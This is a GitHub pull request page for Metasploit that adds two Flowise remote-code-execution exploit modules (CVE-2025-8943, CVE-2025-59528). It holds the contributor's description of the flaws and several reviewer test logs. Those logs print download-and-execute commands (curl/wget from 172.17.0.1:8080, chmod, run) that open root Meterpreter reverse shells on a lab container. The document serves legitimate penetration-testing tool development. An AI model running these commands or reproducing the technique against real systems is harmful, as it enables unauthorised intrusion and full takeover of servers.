Add Flowise RCE exploits (CVE-2025-59528, CVE-2025-8943) #20705
Merged
+890
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Contributor
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
msf exploit(multi/http/flowise_custommcp_rce) > check
[*] Flowise version detected: 3.0.0
[*] 127.0.0.1:3000 - The target appears to be vulnerable. Version 3.0.0 is vulnerable to CVE-2025-8943
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: curl -so ./yvMbpEGLSTB http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yvMbpEGLSTB;./yvMbpEGLSTB&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. Version 3.0.0 is vulnerable to CVE-2025-8943
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (curl/8.12.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.21.0.2:41646) at 2025-11-19 08:37:25 +0100
meterpreter >
meterpreter > sysinfo
Computer : 172.21.0.2
OS : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
…rt and HTTP response validation
…mixin, documentation, and Docker Compose setup
Chocapikk
changed the title
…) and add Basic Auth service example
Contributor
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jMiKfYqrONf http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jMiKfYqrONf;./jMiKfYqrONf&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.21.0.2:50060) at 2025-11-20 10:33:58 +0100
meterpreter >
meterpreter > sysinfo
Computer : 172.21.0.2
OS : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
msf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./IiMLZkCGWZ http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./IiMLZkCGWZ;./IiMLZkCGWZ&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Command sent successfully (HTTP 200)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:42766) at 2025-11-20 10:40:35 +0100
meterpreter > sysinfo
Computer : 172.21.0.2
OS : (Linux 6.17.4-76061704-generic)
Architecture : x64
gBuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
Contributor
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
rmsf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./MyPRGRWPiiTH http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./MyPRGRWPiiTH;./MyPRGRWPiiTH&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
wget -qO ./MyPRGRWPiiTH http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./MyPRGRWPiiTH;./MyPRGRWPiiTH&
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Command sent successfully (HTTP 200)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 5 opened (172.17.0.1:4444 -> 172.21.0.2:49224) at 2025-11-21 14:54:02 +0100
meterpreter >
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./RKJYlPhhUo http://172.17.0.1:8080/84MXSOLXzp3D5wBw9VEswg;chmod +x ./RKJYlPhhUo;./RKJYlPhhUo&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /84MXSOLXzp3D5wBw9VEswg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /84MXSOLXzp3D5wBw9VEswg
[*] Sending payload to 172.21.0.2 (Wget)
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:47464) at 2025-11-21 14:52:17 +0100
meterpreter >
msutovsky-r7
approved these changes
Nov 21, 2025
Contributor
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
Flowise JS RCE
msf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jUSqvQikK http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jUSqvQikK;./jUSqvQikK&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
[*] Command sent successfully (HTTP 200)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:60210) at 2025-11-21 20:48:59 +0100
meterpreter > sysinfo
Computer : 172.21.0.2
OS : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
Flowise custommcp RCE
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jXbVzdDqF http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jXbVzdDqF;./jXbVzdDqF&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.21.0.2:35224) at 2025-11-21 20:51:10 +0100
[!] No response from server (command may still execute in background)
meterpreter >
meterpreter > sysinfo
Computer : 172.21.0.2
OS : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
msutovsky-r7
added
the
rn-modules
Contributor
Release NotesThis adds two modules for two vulnerabilities in Flowise (CVE-2025-59528, CVE-2025-8943). The modules add an option to use Flowise credentials for authentication when the application requires it, enabling exploitation of vulnerabilities. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hello Metasploit Team,
I've created two new exploit modules for Flowise RCE vulnerabilities along with a shared mixin to reduce code duplication and improve maintainability.
Modules
1. flowise_custommcp_rce (CVE-2025-8943)
x-request-from: internalheader). Optional Basic Auth support ifFLOWISE_USERNAME/FLOWISE_PASSWORDenvironment variables are configured on the target.2. flowise_js_rce (CVE-2025-59528)
convertToValidJSONString()usingFunction('return ' + inputString)()FLOWISE_EMAIL/FLOWISE_PASSWORDmodule options for versions >= 3.0.1 (JWT verification introduced)Implementation Details
Shared mixin: Created
Msf::Exploit::Remote::HTTP::Flowisemixin to encapsulate common functionality:flowise_get_version)flowise_login,flowise_requires_auth?)flowise_send_custommcp_request)Documentation: Comprehensive documentation with Docker Compose setup for testing multiple Flowise versions simultaneously
Testing
Successfully tested on:
flowise_custommcp_rce (CVE-2025-8943):
flowise_js_rce (CVE-2025-59528):
Both vulnerabilities exploit the
/api/v1/node-load-method/customMCPendpoint, which was introduced in version 2.2.7-patch.1. The endpoint allows execution of OS commands through the Custom MCPs feature, which lacks proper authentication and authorization controls in versions before 3.0.1.